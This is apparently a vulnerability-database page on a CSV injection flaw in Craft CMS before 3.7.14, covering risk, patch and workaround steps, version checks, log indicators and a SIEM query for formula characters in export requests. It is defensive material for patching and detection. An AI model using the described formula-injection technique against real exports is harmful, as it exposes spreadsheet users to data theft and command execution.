Login Sign Up

CVE-2021-41824

8.8 HIGH

📋 TL;DR

CVE-2021-41824 is a CSV injection vulnerability in Craft CMS that allows attackers to inject malicious formulas into exported CSV files. When victims open these files in spreadsheet applications like Excel, the formulas can execute arbitrary commands or exfiltrate data. This affects all Craft CMS installations before version 3.7.14.

💻 Affected Systems

Products:
  • Craft CMS
Versions: All versions before 3.7.14
Operating Systems: All
Default Config Vulnerable: ⚠️ Yes
Notes: All Craft CMS installations with CSV export functionality are vulnerable by default.

📦 What is this software?

Craft Cms by Craftcms

View all CVEs affecting Craft Cms →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Attackers can execute arbitrary commands on victims' systems when they open malicious CSV files, potentially leading to full system compromise, data theft, or ransomware deployment.

🟠

Likely Case

Attackers trick users into opening CSV files containing malicious formulas that exfiltrate data, execute limited commands, or manipulate spreadsheet data.

🟢

If Mitigated

With proper user education and security controls, impact is limited to potential data manipulation within spreadsheets without system compromise.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ✅ No
Complexity: LOW

Exploitation requires user interaction (opening CSV file) but the injection technique is simple and well-documented.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 3.7.14

Vendor Advisory: https://github.com/craftcms/cms/security/advisories/GHSA-h7vq-5qgw-jwwq

Restart Required: No

Instructions:

1. Backup your Craft CMS installation. 2. Update Craft CMS to version 3.7.14 or later via Composer: 'composer require craftcms/cms:^3.7.14'. 3. Clear caches if necessary.

🔧 Temporary Workarounds

Disable CSV Export

all

Temporarily disable CSV export functionality in Craft CMS until patching is possible.

Input Sanitization

all

Implement custom validation to sanitize user input that may be included in CSV exports.

🧯 If You Can't Patch

  • Educate users to never open CSV files from untrusted sources in spreadsheet applications
  • Configure spreadsheet applications to disable automatic formula execution

🔍 How to Verify

Check if Vulnerable:

Check Craft CMS version in admin panel or via 'composer show craftcms/cms' command.

Check Version:

composer show craftcms/cms | grep version

Verify Fix Applied:

Verify version is 3.7.14 or later and test CSV export functionality with formula characters.

📡 Detection & Monitoring

Log Indicators:

  • Unusual CSV export requests
  • Requests containing formula characters (=, +, -, @) in export parameters

Network Indicators:

  • Large CSV file downloads from Craft CMS
  • Outbound connections from spreadsheet applications after CSV opens

SIEM Query:

source="craftcms" AND (url="*export*" OR url="*csv*") AND (params="*=*" OR params="*+*" OR params="*-*" OR params="*@*")

📊 Metadata

CVE ID: CVE-2021-41824
CVSS v3 Score: 8.8 (HIGH)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE: CWE-1236
Published: September 30, 2021
Last Updated: November 21, 2024

🔗 References

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2021-41824, you might also want to check these:

CVE-2022-45360 9.8

This vulnerability allows CSV injection attacks in the WordPress Commenter Emails plugin. Attackers ...

Same vulnerability type (CWE-1236)
CVE-2022-45810 9.8

This CVE describes a CSV injection vulnerability in the Icegram Express WordPress plugin. Attackers ...

Same vulnerability type (CWE-1236)
CVE-2022-46803 9.8

This vulnerability allows unauthenticated attackers to inject malicious formulas into CSV files expo...

Same vulnerability type (CWE-1236)